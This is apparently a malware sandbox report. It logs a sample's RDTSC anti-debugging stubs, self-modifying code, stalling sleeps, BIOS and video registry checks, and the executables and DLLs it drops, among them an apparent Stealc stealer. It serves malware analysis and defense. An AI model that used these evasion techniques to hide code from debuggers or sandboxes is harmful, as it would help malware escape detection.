Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B05A3 second address: 53B0676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F50F77987h 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1F50F77980h 0x00000015 or cl, 00000038h 0x00000018 jmp 00007F1F50F7797Bh 0x0000001d popfd 0x0000001e jmp 00007F1F50F77988h 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 jmp 00007F1F50F77980h 0x0000002a push eax 0x0000002b jmp 00007F1F50F7797Bh 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F1F50F77984h 0x00000038 or esi, 03800C28h 0x0000003e jmp 00007F1F50F7797Bh 0x00000043 popfd 0x00000044 jmp 00007F1F50F77988h 0x00000049 popad 0x0000004a xchg eax, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F1F50F77987h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0676 second address: 53B067C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B067C second address: 53B06B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bl, ch 0x0000000f popad 0x00000010 xchg eax, edi 0x00000011 jmp 00007F1F50F7797Dh 0x00000016 mov eax, dword ptr [76FAB370h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1F50F7797Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B06B4 second address: 53B0707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1F50CBBC3Ch 0x00000013 or ax, 18D8h 0x00000018 jmp 00007F1F50CBBC3Bh 0x0000001d popfd 0x0000001e mov dl, ah 0x00000020 popad 0x00000021 xor eax, ebp 0x00000023 jmp 00007F1F50CBBC40h 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0707 second address: 53B070B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B070B second address: 53B070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B070F second address: 53B0715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0715 second address: 53B0764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1F50CBBC41h 0x00000011 adc esi, 2BC97486h 0x00000017 jmp 00007F1F50CBBC41h 0x0000001c popfd 0x0000001d movzx eax, bx 0x00000020 popad 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0764 second address: 53B0768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0768 second address: 53B076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B076E second address: 53B07BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov di, FB6Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea eax, dword ptr [ebp-10h] 0x0000000f pushad 0x00000010 mov di, 4C04h 0x00000014 mov cx, di 0x00000017 popad 0x00000018 mov dword ptr fs:[00000000h], eax 0x0000001e jmp 00007F1F50F7797Fh 0x00000023 mov esi, dword ptr [ebp+08h] 0x00000026 jmp 00007F1F50F77986h 0x0000002b mov eax, dword ptr [esi+10h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B07BD second address: 53B07C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B07C1 second address: 53B07C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B07C7 second address: 53B0877 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F1F50CBBC40h 0x00000010 jne 00007F1FC27BB169h 0x00000016 jmp 00007F1F50CBBC40h 0x0000001b sub eax, eax 0x0000001d pushad 0x0000001e mov edx, 42205FF2h 0x00000023 popad 0x00000024 mov dword ptr [ebp-20h], eax 0x00000027 pushad 0x00000028 movsx edi, si 0x0000002b popad 0x0000002c mov ebx, dword ptr [esi] 0x0000002e pushad 0x0000002f call 00007F1F50CBBC46h 0x00000034 pushad 0x00000035 popad 0x00000036 pop ecx 0x00000037 mov eax, edx 0x00000039 popad 0x0000003a mov dword ptr [ebp-24h], ebx 0x0000003d pushad 0x0000003e mov bh, 65h 0x00000040 call 00007F1F50CBBC42h 0x00000045 mov bx, cx 0x00000048 pop esi 0x00000049 popad 0x0000004a test ebx, ebx 0x0000004c pushad 0x0000004d jmp 00007F1F50CBBC43h 0x00000052 popad 0x00000053 je 00007F1FC27BB048h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0877 second address: 53B087D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B087D second address: 53B08AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp ebx, FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F50CBBC3Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B08AC second address: 53B08B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B08B2 second address: 53B08B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B08B6 second address: 53B039F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F1FC2A76D33h 0x0000000d jne 00007F1F50F77999h 0x0000000f xor ecx, ecx 0x00000011 mov dword ptr [esi], ecx 0x00000013 mov dword ptr [esi+04h], ecx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], ecx 0x0000001c mov dword ptr [esi+10h], ecx 0x0000001f mov dword ptr [esi+14h], ecx 0x00000022 mov ecx, dword ptr [ebp-10h] 0x00000025 mov dword ptr fs:[00000000h], ecx 0x0000002c pop ecx 0x0000002d pop edi 0x0000002e pop esi 0x0000002f pop ebx 0x00000030 mov esp, ebp 0x00000032 pop ebp 0x00000033 retn 0004h 0x00000036 nop 0x00000037 pop ebp 0x00000038 ret 0x00000039 add esi, 18h 0x0000003c pop ecx 0x0000003d cmp esi, 00DD5678h 0x00000043 jne 00007F1F50F77960h 0x00000045 push esi 0x00000046 call 00007F1F50F781E3h 0x0000004b push ebp 0x0000004c mov ebp, esp 0x0000004e push dword ptr [ebp+08h] 0x00000051 call 00007F1F5559AE1Dh 0x00000056 mov edi, edi 0x00000058 pushad 0x00000059 push esi 0x0000005a mov ah, bh 0x0000005c pop eax 0x0000005d push eax 0x0000005e push edx 0x0000005f movsx edx, ax 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0CE4 second address: 53A0D01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0D01 second address: 53A0D26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 5892h 0x00000007 movsx ebx, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push ecx 0x00000010 movsx edx, cx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1F50F7797Fh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0D26 second address: 53A0D54 instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1F50CBBC3Eh 0x00000011 sub si, 2308h 0x00000016 jmp 00007F1F50CBBC3Bh 0x0000001b popfd 0x0000001c mov ebx, esi 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0D54 second address: 53A0D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 call 00007F1F50F77987h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1F50F77982h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0D89 second address: 53A0D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0D9F second address: 53A0DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0DA7 second address: 53A0DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 73E81E second address: 73E840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77986h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DDE897 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DDE77C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F99E69 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: FC5B0F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: FA75F9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 73E897 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 73E77C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 8F9E69 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 925B0F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 9075F9 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory allocated: 9C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory allocated: 27A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Memory allocated: D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 15A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 3280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 5280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory allocated: 1330000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory allocated: 3000000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Memory allocated: 5000000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Memory allocated: 1000000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Memory allocated: 2D50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Memory allocated: 4D50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Memory allocated: 2D00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Memory allocated: 2F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Memory allocated: 2D40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory allocated: 1190000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory allocated: 29E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Memory allocated: 2830000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: B40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2850000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Memory allocated: 1250000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Memory allocated: 3030000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Memory allocated: 2D60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Memory allocated: 1700000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Memory allocated: 30C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Memory allocated: 50C0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: C50000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 27C0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 26C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Memory allocated: BA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Memory allocated: 27E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Memory allocated: 47E0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05400E16 rdtsc

0_2_05400E16

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 2259	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 913	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 650	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Window / User API: threadDelayed 1962
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Window / User API: threadDelayed 1804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2687
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Window / User API: threadDelayed 2279
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	Window / User API: threadDelayed 2906
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Window / User API: threadDelayed 636

Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\neon[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\is-8M782.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\libssl-1_1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\is-S5HN7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\is-65AJA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\uninstall\is-4OQD3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000355001\2a8f2f9086.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\is-NSLMU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\msvcr71.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\msvcp71.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\is-AMTS2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\Qt5OpenGL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\is-0DA5B.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\uninstall\unins000.exe (copy)	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API coverage: 9.8 %
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	API coverage: 9.4 %
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	API coverage: 3.4 %
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	API coverage: 1.4 %

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6476	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6476	Thread sleep time: -76038s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6460	Thread sleep count: 149 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6460	Thread sleep time: -298149s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1848	Thread sleep count: 177 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1848	Thread sleep time: -5310000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5252	Thread sleep count: 129 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5252	Thread sleep time: -258129s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6544	Thread sleep count: 2259 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6544	Thread sleep time: -4520259s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6204	Thread sleep count: 156 > 30	Jump to behavior
